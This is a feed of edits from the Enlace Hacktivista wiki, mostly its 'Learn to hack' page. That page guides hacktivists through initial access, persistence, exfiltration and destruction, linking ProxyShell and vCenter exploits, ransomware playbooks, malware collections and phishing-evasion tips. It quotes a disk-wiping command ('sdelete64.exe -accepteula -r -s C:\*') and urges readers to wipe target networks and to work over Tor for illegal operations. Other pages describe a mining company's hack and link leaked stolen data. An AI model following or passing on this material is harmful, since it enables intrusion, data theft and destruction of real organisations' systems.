https://enlacehacktivista.org/api.php?action=feedcontributions&user=Enlacehacktivista&feedformat=atomEnlace Hacktivista - User contributions [en]2024-03-29T11:13:57ZUser contributionsMediaWiki 1.38.2https://enlacehacktivista.org/index.php?title=Learn_to_hack&diff=1702Learn to hack2023-11-21T22:37:19Z<p>Enlacehacktivista: </p>
<hr />
<div>This page aims to compile high quality resources for hackers for both the experienced and inexperienced. All books listed on this page can be [https://libgen.lc found] on [https://libgen.fun/ Library Genesis].<br />
<br />
Make sure that you follow good OPSEC when carrying out your operations! See [https://enlacehacktivista.org/index.php?title=Learn_to_hack#Operational_security OPSEC]<br />
<br />
== General Resources ==<br />
<br />
Resources that assume little to no background knowledge:<br />
* https://www.hoppersroppers.org/training.html<br />
* https://tryhackme.com/<br />
<br />
Resources that assume minimal tech background:<br />
* (book) Penetration Testing: A Hands-On Introduction to Hacking<br />
* [https://web.archive.org/web/20230531145531/https://papers.vx-underground.org/papers/Malware%20Defense/Malware%20Analysis%202021/2021-08-31%20-%20Bassterlord%20%28FishEye%29%20Networking%20Manual%20%28X%29.pdf Bassterlord Networking Manual (translated)] (Focuses on [https://enlacehacktivista.org/index.php?title=Fortinet_SSL_VPN_Path_Traversal exploiting and hacking into networks via Forti SSL VPN])<br />
* [https://web.archive.org/web/20230531144434if_/https://cdn-151.anonfiles.com/vcD868ubz5/08a9b897-1685544763/BasterLord+-+Network+manual+v2.0.pdf Bassterlord Networking Manual v2.0 (translated)] (Focuses on [[VPN brute forcing]])<br />
* Translated: [https://web.archive.org/web/20230404175503if_/https://cdn-150.anonfiles.com/satbX2i8z2/75a3be58-1680631481/Conti_playbook_translated.pdf Conti playbook]<br />
* LockBit 3.0 CobaltStrike: [https://web.archive.org/web/20230701141731if_/https://cdn-147.anonfiles.com/s1cbD0z3z3/4536e4f8-1688221595/LockBit-CobaltStrike.pdf LockBit 3.0 Guide]<br />
<br />
Resources that assume a tech or hacking background:<br />
* (book) The Hacker Playbook 3<br />
* [[Hack Back! A DIY Guide]]<br />
* https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak<br />
* [https://enlacehacktivista.org/images/8/8f/Flexispy.txt Flexispy Hack Back]<br />
* [https://enlacehacktivista.org/libertycounsel.txt Liberty Counsel Hack Back]<br />
* [https://youtu.be/kCLDqvDnGzA Catalan Police Union Hack Back]<br />
* https://book.hacktricks.xyz<br />
* [https://kolektiva.media/w/twJjCTkvumnugRy61BjD3T Pronico Hack Back]<br />
* https://github.com/Correia-jpv/fucking-the-book-of-secret-knowledge<br />
* https://github.com/0xPugazh/One-Liners<br />
<br />
The Bug Hunters Methodology:<br />
* https://github.com/jhaddix/tbhm<br />
* Application Analysis: https://youtu.be/FqnSAa2KmBI <br />
* The Bug Hunter's Methodology v4.0: https://youtu.be/p4JgIu1mceI?si=jXcYksd4UqodZDBF<br />
Practice labs:<br />
* https://www.hackthebox.com<br />
* https://academy.hackthebox.com<br />
* https://www.pentesteracademy.com<br />
* https://lab.pentestit.ru<br />
* https://overthewire.org/wargames<br />
* https://www.vulnhub.com/<br />
<br />
Appsec:<br />
* https://github.com/paragonie/awesome-appsec<br />
<br />
Malware, a collection of malware source code and binaries:<br />
* https://github.com/vxunderground/MalwareSourceCode<br />
* https://github.com/ytisf/theZoo/tree/master/malware<br />
<br />
=== General references ===<br />
<br />
General resources you may find useful for learning. <br />
<br />
See [[General References]]<br />
<br />
[https://owasp.org/www-project-top-ten/ OWASP Top 10] is a broad consensus about the most critical security risks to web applications. See TryHackMe's [https://tryhackme.com/room/owasptop10 room] for practical OWASP Top 10 learning and their [https://tryhackme.com/room/owaspjuiceshop Juice Shop].<br />
<br />
== Recommended Reading - The Library ==<br />
See recommended reading [https://libgen.fun books] that will aid you in your learning. See [[recommended reading in the library]]<br />
<br />
* [https://theanarchistlibrary.org/special/index The Anarchist Library] ([http://libraryqxxiqakubqv3dc2bend2koqsndbwox2johfywcatxie26bsad.onion/special/index Tor])<br />
* Phrack: http://phrack.org<br />
<br />
== Operational security ==<br />
<br />
Operational security (OPSEC) is crucial for protecting oneself from surveillance and maintaining anonymity while conducting hacktivist operations.<br />
<br />
=== Recommended Measures ===<br />
<br />
Any illegal hacktivity should be done from an encrypted and separate computer or virtual machine, with all traffic router over Tor.<br />
<br />
For more information on recommended operational security measures, see [[Opsec Measures]]<br />
<br />
=== Secure Messaging ===<br />
<br />
Best practice for secure messaging includes proxying connections over Tor and using end-to-end encryption for messages.<br />
<br />
==== Recommended Applications ====<br />
<br />
For Jabber/XMPP, make sure to enable OTR or OMEMO encryption. For e-mail use PGP for encryption. For file sharing use onionshare.<br />
<br />
For more information on recommended applications, see [[Secure Messaging Applications]]<br />
<br />
== Initial Access ==<br />
<br />
There are many ways to gain [https://attack.mitre.org/tactics/TA0001/ initial access] into a targets network, from phishing, buying credential access, buying infected machines in corporate networks, password spraying, performing a targeted [https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets penetration test] and spray and pray scanning for vulnerabilities and hacking in. Here we list some resources in these regards.<br />
<br />
=== Common Initial Access TTPs ===<br />
<br />
For more information on gaining a foothold, see [[Initial Access Tactics, techniques and procedures]]<br />
<br />
=== Attacking Common Services ===<br />
Your targets will likely use many services either externally or internally, this could be SSH, RDP, SMB, etc. It's important to know their common misconfigurations, attack vectors, their attack surface and how to hack these various protocols which may serve as the initial access vector. Here we cover various tools, techniques, common misconfigurations, tips and tricks and we cover both internal and external (publicly accessible) networks.<br />
<br />
See [[Common Service Attacks]]<br />
<br />
=== Scanning and Recon ===<br />
<br />
For [https://attack.mitre.org/tactics/TA0043 scanning and recon] tools, see [[Scanning and Recon]]. Make sure to make use of your tool's documentation and read the help menu (-hh/-h/--help).<br />
<br />
=== Search Engines ===<br />
<br />
Search engines are a useful tool for gathering information and intelligence from publicly available sources. Some are paid and some are free. Make sure to operate good OPSEC whenever placing a purchase for any service that will be used in your recon on a target.<br />
<br />
For more information on recommended search engines, see [[Search Engines Resources]]<br />
<br />
=== OSINT ===<br />
<br />
Open-source intelligence (OSINT) refers to the collection and analysis of information from publicly available sources.<br />
<br />
For more information on recommended tools and resources, see [[OSINT Tools and Resources]]<br />
<br />
== Persistence ==<br />
Once you've found a weakness in your targets infrastructure and have been able to gain [https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures initial access] you'll want to keep it and avoid detection to maintain your access to your targets network for as long as possible.<br />
<br />
See [[Persistence]].<br />
<br />
== Post exploitation ==<br />
<br />
=== Windows ===<br />
For Windows post exploitation, Active Directory and networking hacking, Lateral movement techniques, privilege escalation, defensive and offensive techniques:<br />
<br />
See [[Hacking Windows]]<br />
<br />
=== Linux ===<br />
For performing Linux post exploitation, gaining persistence, evading detection, privilege escalation and more:<br />
<br />
See [[Hacking Linux]]<br />
<br />
== Exfiltration ==<br />
One of the main objectives for a hacktivist is that of exfiltrating data, company secrets and if your motivations is that of revealing corruption then this step is of the most importance.<br />
<br />
See [[Data Exfiltration]] for techniques and methods for exfiltrating data out of your targets network.<br />
<br />
== Destruction ==<br />
There may be times during a hacktivist operation when you come to the end of your hack, you've fully compromised your target, exfiltrated everything you can/want and now before finally leaving the network and leaking all the targets secrets online you want to cause chaos and destruction. [https://kolektiva.media/w/twJjCTkvumnugRy61BjD3T As was seen by Guacamaya] where they used <code>sdelete64.exe -accepteula -r -s C:\*</code> to wipe systems attached to Pronicos domain you might also want to do the same for Linux and Windows systems in your operations, maybe you want to recursively print a text file with your manifesto across a system/network, encrypt files beyond recovery or just delete everything.<br />
<br />
See [[Chaos and Destruction]] for different ways to achieve this!<br />
<br />
== Hacking Misc ==<br />
<br />
=== Web Application Hacking ===<br />
<br />
See [[Hacking Web Applications]]<br />
<br />
=== API Hacking ===<br />
Application Programming Interfaces (APIs) are the plumbing of today’s financial services and FinTech infrastructure, enabling FinTechs to embed banking into their apps and banks to offer a more unified experience to their customers demanding more from their bank ([https://web.archive.org/web/20230713230449if_/https://cdn-153.anonfiles.com/a5Q8c02azf/b80f3b8b-1689290042/Scorched-Earth-Whitepaper.pdf Knight]). [https://owasp.org/www-project-api-security APIs can be exploited] to aid in data exfiltration and taking advantage of an existing service.<br />
<br />
See [[Hacking APIs]]!<br />
<br />
=== IoT Hacking ===<br />
* https://github.com/V33RU/IoTSecurity101<br />
<br />
=== Hacking The Cloud ===<br />
More and more of corporate networks are moving away from on-prem to in the cloud. Learning how to [https://hackingthe.cloud hack the cloud infrastructure] of your target is a valuable skill and as time progresses more and more networks will migrate towards the cloud.<br />
<br />
See [[Cloud Hacking]]<br />
<br />
=== Reverse Engineering ===<br />
As was seen by [https://enlacehacktivista.org/index.php?title=Hack_Back!_A_DIY_Guide Phineas Fisher], highly motivated hacktivists who seek to hack their targets by any means necessary should consider 0-day research and exploit development, reverse engineering applications and services that their target may be running to gain an initial foothold and perform post exploitation.<br />
<br />
See [[Reverse Engineering]]<br />
<br />
== Product-specific Hacking ==<br />
<br />
=== Google Workspace ===<br />
https://www.slideshare.net/dafthack/ok-google-how-do-i-red-team-gsuite<br />
<br />
=== VMware ===<br />
* Exploiting vCenter to add vSphere user: https://github.com/HynekPetrak/HynekPetrak/blob/master/take_over_vcenter_670.md<br />
* VMware Workspace ONE Access and Identity Manager RCE via SSTI. [https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis CVE-2022-22954:] Unauthenticated server-side template injection. [https://github.com/tunelko/CVE-2022-22954-PoC Mass Exploit]<br />
<br />
=== Rocket.Chat ===<br />
* Account hijacking and RCE as admin: [https://web.archive.org/web/20210805092939/https://edbrsk.dev/content/real-cases/how-I-compromised-300-stores-and-a-spanish-consultancy https://edbrsk.dev/content/real-cases/how-I-compromised-300-stores-and-a-spanish-consultancy]<br />
<br />
=== Microsoft Exchange ===<br />
<br />
ProxyLogon is dead. It's mitigated by Defender. ProxyShell is not. AMSI catches unmodified public exploits.<br />
<br />
* ProxyShell: https://github.com/dmaasland/proxyshell-poc<br />
* Improved proxyshell-poc: https://github.com/horizon3ai/proxyshell<br />
* ProxyShell (webshell via New-MailboxExportRequest): https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/http/exchange_proxyshell_rce.md<br />
* ProxyShell (webshell via New-ExchangeCertificate): https://gist.github.com/dmaasland/0720891aaf6dec8d3b42a5b92c8d6f94<br />
* Polymorphic webshells: https://github.com/grCod/poly<br />
* ProxyShell (no webshell, dump mailboxes via PowerShell): https://github.com/Jumbo-WJB/Exchange_SSRF<br />
* Proxylogon, proxyshell, proxyoracle and proxytoken full chain exploit tool: https://github.com/FDlucifer/Proxy-Attackchain<br />
* Automatic ProxyShell Exploit: https://github.com/Udyz/proxyshell-auto</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Guacamaya&diff=1689Guacamaya2023-11-10T17:45:00Z<p>Enlacehacktivista: /* Entrevistas */</p>
<hr />
<div>[[File:Guacamayas.jpeg|thumb|el colectivo]]<br />
Guacamaya es un grupo de hackers que busca la liberación de los pueblos y el territorio de Abya Yala, hasta ahora enfocándose en hackear a empresas extractivistas y fuerzas represivas (policia y militar)<br />
<br><br />
Nunca tendrán cuentas en redes sociales. [https://twitter.com/guacamayahacks Estas] [https://twitter.com/GuacamayanLeaks cuentas] son [https://www.milenio.com/opinion/viri-rios/no-es-normal/el-engano-de-la-cuenta-falsa-de-guacamaya falsas.]<br />
<br />
== Hackeos ==<br />
<br />
* [[Pronico]]<br />
* [[Extractivist Leaks/es|Extractivist Leaks]]<br />
* [[Fiscalia|Fiscalia de Colombia]]<br />
* [[Fuerzas Represivas]]<br />
<br />
== Comunicados ==<br />
* [https://enlacehacktivista.org/comunicado_guacamaya.txt Pronico]<br />
* [https://enlacehacktivista.org/comunicado_guacamaya2.txt Extractivist Leaks]<br />
* [https://enlacehacktivista.org/comunicado_guacamaya3.txt Fiscalia de Colombia]<br />
* [https://enlacehacktivista.org/comunicado_guacamaya4.txt Fuerzas Represivas]<br />
<br />
== Poemas ==<br />
* https://enlacehacktivista.org/poema_guacamaya.txt<br />
<br />
== Videos ==<br />
* [https://enlacehacktivista.org/hackback.webm Hackeo de Pronico]<br />
* [https://enlacehacktivista.org/hackback2.webm Explotación de Proxyshell] usado en todos los hackeos de [[Extractivist Leaks/es|Extractivist Leaks]], [[Fiscalia|Fiscalia de Colombia]], y [[Fuerzas Represivas]] con la excepción de [[Fuerzas Represivas#Explicación del Hackeo|Sedena.]]<br />
<br />
== Entrevistas ==<br />
* https://forbiddenstories.org/es/la-lucha-por-un-territorio-es-la-lucha-de-todas/<br />
* https://la-lista.com/mexico/2022/10/10/hackers-guacamaya-entrevista-exclusiva-con-el-grupo-hacktivista<br />
* https://www.vice.com/en/article/5d39j3/meet-the-environmental-hacktivists-trying-to-sabotage-mining-companies<br />
* https://www.biobiochile.cl/especial/bbcl-investiga/noticias/reportajes/2022/09/28/hablan-hackers-revelan-que-estado-mayor-conjunto-eligio-no-reparar-falla-que-posibilito-ataque.shtml<br />
* https://web.archive.org/web/20221013210822/https://loquesigue.tv/quien-esta-detras-de-los-guacamayaleaks-entrevista-al-colectivo-guacamaya/<br />
* https://www.ultimominuto.news/noticias/Entrevista-con-Guacamaya-Cual-fue-el-hallazgo-mas-importante-del-hackeo-20221016-0016.html<br />
* https://es.globalvoices.org/2022/11/30/guacamaya-el-hackeo-debe-servir-para-despertar-y-rebelarse/<br />
* https://cyberscoop.com/guacamaya-hacktivist-group-latin-america-interview/<br />
<br />
== Ilustraciones ==<br />
<br />
[[File:Resistencia_Milenaria.png|400px|border|una guacamaya descargando correos]]<br />
[[File:Fin_de_la_mina.png|400px|border|Fin de la mina]]<br />
[[File:Resistencia milenaria2.png|400px|border|una guacamaya descargando correos]]<br />
[[File:Fin_de_la_milicia.png|400px|border|Fin de la milicia]]<br />
[[File:Video_background.png|400px|border|video background]]<br />
<br />
<br />
[[Category:Hackers]]</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Pronico&diff=1688Pronico2023-11-09T22:02:09Z<p>Enlacehacktivista: </p>
<hr />
<div>Pronico operates the Fenix mine in Guatemala, which has a long history of human rights abuses, environmental damage, and resistance by the surrounding communities.<br />
<br />
== Media Coverage ==<br />
English:<br />
* https://ddosecrets.com/wiki/Mining_Secrets<br />
* https://forbiddenstories.org/case/mining-secrets/<br />
* https://www.theguardian.com/global-development/2022/mar/06/indigenous-groups-oppose-restarting-guatemala-nickel-mine<br />
* https://www.occrp.org/en/investigations/mining-secrets-major-nickel-producer-accused-of-polluting-guatemalas-largest-lake#<br />
<br />
Spanish:<br />
* https://www.prensacomunitaria.org/2022/03/diez-claves-para-leer-la-investigacion-miningsecrets/<br />
* https://forbiddenstories.org/es/case/mining-secrets/<br />
* https://elpais.com/internacional/2022-03-06/asi-se-compra-un-estado-como-una-minera-rusa-corrompio-a-todos-los-poderes-en-guatemala.html<br />
* https://www.prensacomunitaria.org/2022/03/solway-la-minera-senalada-de-espionaje-a-periodistas-rechaza-acusaciones/<br />
* https://www.prensacomunitaria.org/2022/03/secreto-minero-una-investigacion-sobre-las-estrategias-de-una-mina-rusa-en-guatemala6/<br />
* https://elfaro.net/es/202203/centroamerica/26055/Filtraci%C3%B3n-de-documentos-confirma-cooptaci%C3%B3n-del-Estado-guatemalteco-por-empresa-minera.htm<br />
* https://storeproject.squarespace.com/secretos-mineros/espionaje-y-criminalizacion<br />
* https://desinformemonos.org/la-version-caribena-de-una-red-criminal-entre-rusos-suizos-y-chapines-en-guatemala/<br />
* https://desinformemonos.org/%d0%b3%d0%b2%d0%b0%d1%82%d0%b5%d0%bc%d0%b0%d0%bb%d0%b0-los-senores-del-polvo-rojo-y-los-senores-del-polvo-blanco/<br />
* https://desinformemonos.org/%d0%b3%d0%b2%d0%b0%d1%82%d0%b5%d0%bc%d0%b0%d0%bb%d0%b0-guatemala-se-escribe-en-ruso/<br />
<br />
== Hack ==<br />
The hack was done by a group calling themselves [[Guacamaya]]<br />
* [https://enlacehacktivista.org/comunicado_guacamaya.txt Statement by the hackers]<br />
* [https://forbiddenstories.org/the-struggle-of-one-territory-must-be-the-struggle-of-all/ Interview]<br />
* [[Media:Pronico.png|Screenshot]] of a statement posted to Pronico's website by the hackers<br />
<br />
=== Video ===<br />
The hackers published a video showing in detail how they hacked Pronico, downloaded files and emails to leak, and then repeatedly sabotaged the company's computers over the course of 6 months. It can be downloaded [https://enlacehacktivista.org/hackback.webm here] or watched [https://kolektiva.media/w/twJjCTkvumnugRy61BjD3T here.] Credits for the video's soundtrack is available [https://enlacehacktivista.org/guacamaya_soundtrack.txt here]<br />
<br />
==== Video Timeline ====<br />
<nowiki><br />
0:51 Introduction<br />
2:05 ProxyLogon<br />
5:35 Other methods of initial access<br />
7:15 Get Domain Admin via dumping LSA secrets<br />
13:35 Lateral movement onto other servers<br />
15:40 Backdooring a switch<br />
21:42 Golden Tickets<br />
25:08 Eternal Blue<br />
32:56 Enabling wdigest and dumping passwords with mimikatz<br />
33:53 Grabbing VPN and saved browser passwords of sysadmin<br />
40:26 Scanning for SMB shares<br />
42:45 Exfiltrating files<br />
49:09 Enabling file sharing via group policy<br />
54:35 Exfiltrating email<br />
1:03:22 Wiping company's storage servers<br />
1:11:31 Wiping computers with Kaspersky<br />
1:13:07 Wiping servers using diskpart<br />
1:14:46 Wiping Office 365<br />
1:24:16 Wiping windows domain with Bitlocker<br />
1:40:28 Stealthy persistence and avoiding AV with dnscat2<br />
1:45:28 Avoiding AV with mimikatz<br />
1:47:03 Wiping storage servers via iscsi<br />
2:06:18 Avoiding AV to exploit PrintNightmare<br />
2:13:35 Wiping windows domain with sdelete<br />
</nowiki><br />
<br />
[[Category:Hacks]]</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=WebDetetive&diff=1687WebDetetive2023-11-09T19:16:32Z<p>Enlacehacktivista: /* Media Coverage */</p>
<hr />
<div>'''NOTE:''' This page is under construction<br />
<br />
== Media Coverage ==<br />
# https://ddosecrets.com/wiki/WebDetetive<br />
# https://techcrunch.com/2023/08/26/brazil-webdetetive-spyware-deleted/</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=File:Video_background.png&diff=1686File:Video background.png2023-11-09T18:18:52Z<p>Enlacehacktivista: </p>
<hr />
<div>Modification of the cover illustration of the [https://theanarchistlibrary.org/library/donna-haraway-a-cyborg-manifesto Cyborg Manifesto]</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Guacamaya&diff=1685Guacamaya2023-11-09T18:11:04Z<p>Enlacehacktivista: /* Ilustraciones */</p>
<hr />
<div>[[File:Guacamayas.jpeg|thumb|el colectivo]]<br />
Guacamaya es un grupo de hackers que busca la liberación de los pueblos y el territorio de Abya Yala, hasta ahora enfocándose en hackear a empresas extractivistas y fuerzas represivas (policia y militar)<br />
<br><br />
Nunca tendrán cuentas en redes sociales. [https://twitter.com/guacamayahacks Estas] [https://twitter.com/GuacamayanLeaks cuentas] son [https://www.milenio.com/opinion/viri-rios/no-es-normal/el-engano-de-la-cuenta-falsa-de-guacamaya falsas.]<br />
<br />
== Hackeos ==<br />
<br />
* [[Pronico]]<br />
* [[Extractivist Leaks/es|Extractivist Leaks]]<br />
* [[Fiscalia|Fiscalia de Colombia]]<br />
* [[Fuerzas Represivas]]<br />
<br />
== Comunicados ==<br />
* [https://enlacehacktivista.org/comunicado_guacamaya.txt Pronico]<br />
* [https://enlacehacktivista.org/comunicado_guacamaya2.txt Extractivist Leaks]<br />
* [https://enlacehacktivista.org/comunicado_guacamaya3.txt Fiscalia de Colombia]<br />
* [https://enlacehacktivista.org/comunicado_guacamaya4.txt Fuerzas Represivas]<br />
<br />
== Poemas ==<br />
* https://enlacehacktivista.org/poema_guacamaya.txt<br />
<br />
== Videos ==<br />
* [https://enlacehacktivista.org/hackback.webm Hackeo de Pronico]<br />
* [https://enlacehacktivista.org/hackback2.webm Explotación de Proxyshell] usado en todos los hackeos de [[Extractivist Leaks/es|Extractivist Leaks]], [[Fiscalia|Fiscalia de Colombia]], y [[Fuerzas Represivas]] con la excepción de [[Fuerzas Represivas#Explicación del Hackeo|Sedena.]]<br />
<br />
== Entrevistas ==<br />
* https://forbiddenstories.org/es/la-lucha-por-un-territorio-es-la-lucha-de-todas/<br />
* https://la-lista.com/mexico/2022/10/10/hackers-guacamaya-entrevista-exclusiva-con-el-grupo-hacktivista<br />
* https://www.vice.com/en/article/5d39j3/meet-the-environmental-hacktivists-trying-to-sabotage-mining-companies<br />
* https://www.biobiochile.cl/especial/bbcl-investiga/noticias/reportajes/2022/09/28/hablan-hackers-revelan-que-estado-mayor-conjunto-eligio-no-reparar-falla-que-posibilito-ataque.shtml<br />
* https://loquesigue.tv/quien-esta-detras-de-los-guacamayaleaks-entrevista-al-colectivo-guacamaya/<br />
* https://www.ultimominuto.news/noticias/Entrevista-con-Guacamaya-Cual-fue-el-hallazgo-mas-importante-del-hackeo-20221016-0016.html<br />
* https://es.globalvoices.org/2022/11/30/guacamaya-el-hackeo-debe-servir-para-despertar-y-rebelarse/<br />
* https://cyberscoop.com/guacamaya-hacktivist-group-latin-america-interview/<br />
<br />
== Ilustraciones ==<br />
<br />
[[File:Resistencia_Milenaria.png|400px|border|una guacamaya descargando correos]]<br />
[[File:Fin_de_la_mina.png|400px|border|Fin de la mina]]<br />
[[File:Resistencia milenaria2.png|400px|border|una guacamaya descargando correos]]<br />
[[File:Fin_de_la_milicia.png|400px|border|Fin de la milicia]]<br />
[[File:Video_background.png|400px|border|video background]]<br />
<br />
<br />
[[Category:Hackers]]</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=File:Video_background.png&diff=1684File:Video background.png2023-11-09T18:08:20Z<p>Enlacehacktivista: </p>
<hr />
<div></div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Enlace_Hacktivista&diff=1683Enlace Hacktivista2023-11-09T18:01:55Z<p>Enlacehacktivista: /* News */</p>
<hr />
<div>Welcome to Enlace Hacktivista! This site aims to:<br />
<br />
# Document [[Hacker History|hacker history]].<br />
# [[Learn to hack|Share educational resources]] for hackers and those who want to learn.<br />
# Provide a space for hackers to publish their hacks, leaks, and [[:Category:Communiques|communiques]]. If you have something to publish, [[contact|write us]].<br />
# Publish news relevant to hackers, with a focus on supporting [[:Category:Ongoing Cases|hackers imprisoned or facing trial]]. If you know important news we should publish, [[contact|write us]].<br />
<br />
Feel free to edit the wiki! See [[Editing]]<br />
<br />
[https://twitter.com/GuacamayanLeaks GuacamayanLeaks] is a fake twitter account [https://www.milenio.com/opinion/viri-rios/no-es-normal/el-engano-de-la-cuenta-falsa-de-guacamaya seemingly operated by the people running anti-AMLO twitter bots.] Neither Guacamaya nor Enlace Hacktivista will ever have accounts on social networks.<br />
<br><br />
El grupo Guacamaya nunca tendrá cuentas en redes sociales. [https://twitter.com/GuacamayanLeaks Esta cuenta] es [https://www.milenio.com/opinion/viri-rios/no-es-normal/el-engano-de-la-cuenta-falsa-de-guacamaya falsa.]<br />
<br />
== News ==<br />
<br />
* Jan 13, 2023: An anonymous whistleblower sent us phone forensics software and documentation from Cellebrite and MSAB. These companies sell to police and governments around the world who use it to collect information from the phones of journalists, activists, and dissidents. Both companies' software is well documented as being used in human rights abuses[https://www.accessnow.org/what-spy-firm-cellebrite-cant-hide-from-investors/][https://theintercept.com/2021/06/14/myanmar-msab-eu-technology-regulation/][https://cpj.org/2021/07/botswana-cellebrite-search-journalists-phone/] The leaks are available for download as torrents[https://enlacehacktivista.org/cellebrite.torrent][https://enlacehacktivista.org/MSAB.torrent] or direct download[https://files.enlacehacktivista.org/cellebrite/][https://files.enlacehacktivista.org/msab.tar.zst]<br />
* Sep 19, 2022: We've received a [https://enlacehacktivista.org/comunicado_guacamaya4.txt statement,] [https://enlacehacktivista.org/poema_guacamaya.txt poem,] and [https://enlacehacktivista.org/hackback2.webm video] to publish from the hacker group [[Guacamaya]] on their leak of military and police emails from various countries. For more information see [[Fuerzas_Represivas|here.]]<br />
* Aug 7, 2022: We've received a [https://enlacehacktivista.org/comunicado_guacamaya3.txt statement] to publish from hackers going by the name "Guacamaya", along with 5 TB of email from [https://www.opendemocracy.net/en/democraciaabierta/la-fiscal%C3%ADa-general-de-la-naci%C3%B3n-en-colombia-devorada-por-corrupci%C3%B3n-en/ Fiscalia of Colombia.] See [[Fiscalia|here]] for more information.<br />
* Aug 1, 2022: We've received a [https://enlacehacktivista.org/comunicado_guacamaya2.txt statement] to publish from hackers going by the name "Guacamaya", along with several TB of email from various mining and oil companies. The emails can be searched [https://piler.enlacehacktivista.org here,] or downloaded [https://files.enlacehacktivista.org here.] See [[Extractivist Leaks/es|here]] for more information.<br />
* Jul 21, 2022: Motivated by Liberty Counsel's legal attacks against LGBTQ and abortion rights, anonymous hackers hacked Liberty Counsel and a host of other evangelical and right-wing groups who used the same web developer. Recently while celebrating the decision to overturn Roe v Wade, Liberty Counsel's director said they [https://www.rollingstone.com/politics/politics-features/roe-supreme-court-justices-1378046/ prayed with Supreme Court justices.] A statement by the hackers is available [https://enlacehacktivista.org/libertycounsel.txt here,] and the leaked data is available as a [https://enlacehacktivista.org/libertycounsel.torrent torrent.]<br />
* May 13, 2022: Anonymous hackers sent us around 250 GB of email from REA Kaltim Plantations, a palm oil company in Indonesia. The hackers were motivated by the company's land theft and abuses towards indigenous residents, along with environmental damage. A brief description can be found [https://ejatlas.org/print/pt-rea-kaltim-plantations-in-east-kalimantan here.] The hackers would also like to give a shout out to Kecoak Elektronik. The emails are available as a [https://enlacehacktivista.org/reakaltim.torrent torrent,] or [https://files.enlacehacktivista.org/rea.co.id/ direct download.]<br />
* May 2, 2022: Nauru is a small island where Australia keeps refugees and asylum seekers in horrific conditions. By keeping them on a remote island, Australia intends to invisibilize their situation. Motivated by this, anonymous hackers sent us 55 GB of email of the island's police, along with a [https://enlacehacktivista.org/nauru.txt statement.] The mail can be downloaded as a [https://enlacehacktivista.org/nauru.torrent torrent,] or [https://files.enlacehacktivista.org/npf.gov.nr/ directly.] More information is available [[Nauru Police Force|here.]]<br />
* March 6, 2022: We've received a [https://enlacehacktivista.org/comunicado_guacamaya.txt statement] and [https://enlacehacktivista.org/hackback.webm video] to publish from hackers going by the name "Guacamaya" about their hack of the company CGN/Pronico. Pronico operates the Fenix mine in Guatemala, which has a long history of human rights abuses, environmental damage, and resistance by the surrounding communities. The video shows in detail how the hackers gained access in the company's network, downloaded emails and files, and then proceeded to sabotage the company's computers. Credits for the video's soundtrack are available [https://enlacehacktivista.org/guacamaya_soundtrack.txt here.] All the leaked files are available for download from [https://ddosecrets.com/wiki/Mining_Secrets DDoS.] Forbidden Stories [https://forbiddenstories.org/case/mining-secrets/ have just published their investigations] based on the leak. Also the company [https://archive.is/VnA3A on it's website] has published a statement where they announce that sustainable mining is a lie, and call on the Guatemalan government to not only suspend their own mining license, but suspend all licenses for surface mining, as Honduras recently did. It's possible that statement was posted by the hackers and not actually by the company. More information is available on the [[Pronico]] page.<br />
<br />
<br />
[https://lists.riseup.net/www/subscribe/enlacehacktivista Subscribe to our mailing list] to get notified when news is published.</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures&diff=1682Initial Access Tactics, techniques and procedures2023-11-09T17:57:08Z<p>Enlacehacktivista: /* Buying access */</p>
<hr />
<div>== Phishing ==<br />
[https://www.frontiersin.org/articles/10.3389/fcomp.2021.563060/full Phishing] is the most common attack method favored by advanced persistent threat groups and cyber criminal organized gangs. This is because it relies on social engineering to trick the target to either download a malicious email attachment or click on a malicious link.<br />
<br />
==== Tools ====<br />
* https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html<br />
* https://medium.com/maltrak/com-objects-p-2-your-stealthy-fileless-attack-bf78318d9165<br />
* https://infosecwriteups.com/recipe-for-a-successful-phishing-campaign-part-1-2-dc23d927ec55<br />
* https://www.xanthus.io/mastering-the-simulated-phishing-attack<br />
* https://github.com/Arno0x/EmbedInHTML<br />
* https://github.com/L4bF0x/PhishingPretexts<br />
* http://lockboxx.blogspot.com/2018/12/gophish-evilginx2-for-phishing.html<br />
* https://book.hacktricks.xyz/phishing-methodology<br />
* https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective<br />
* https://delta.navisec.io/a-pentesters-guide-part-4-grabbing-hashes-and-forging-external-footholds/<br />
* https://www.rootshellsecurity.net/ntlm_theft-a-tool-for-file-based-forced-ntlm-hash-disclosure/<br />
* https://getgophish.com/ Be sure to [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]<br />
* https://github.com/curtbraz/PhishAPI<br />
* https://github.com/edoverflow/can-i-take-over-xyz<br />
* https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/<br />
* Phishing with GoPhish and DigitalOcean: https://www.ired.team/offensive-security/initial-access/phishing-with-gophish-and-digitalocean | [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]<br />
* Phishing with MS Office: https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office<br />
<br />
== Password Attacks ==<br />
Groups like [https://www.microsoft.com/en-us/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/ Lapsus$] show's the world that you don't need to be a great technical hacker to pwn massive corporations and if common password and multi-factor authentication (MFA) attacks work on the likes of [https://en.wikipedia.org/wiki/Lapsus$ Uber, Rockstar games, Okta and so on] then they will work on our hacktivist targets!<br />
<br />
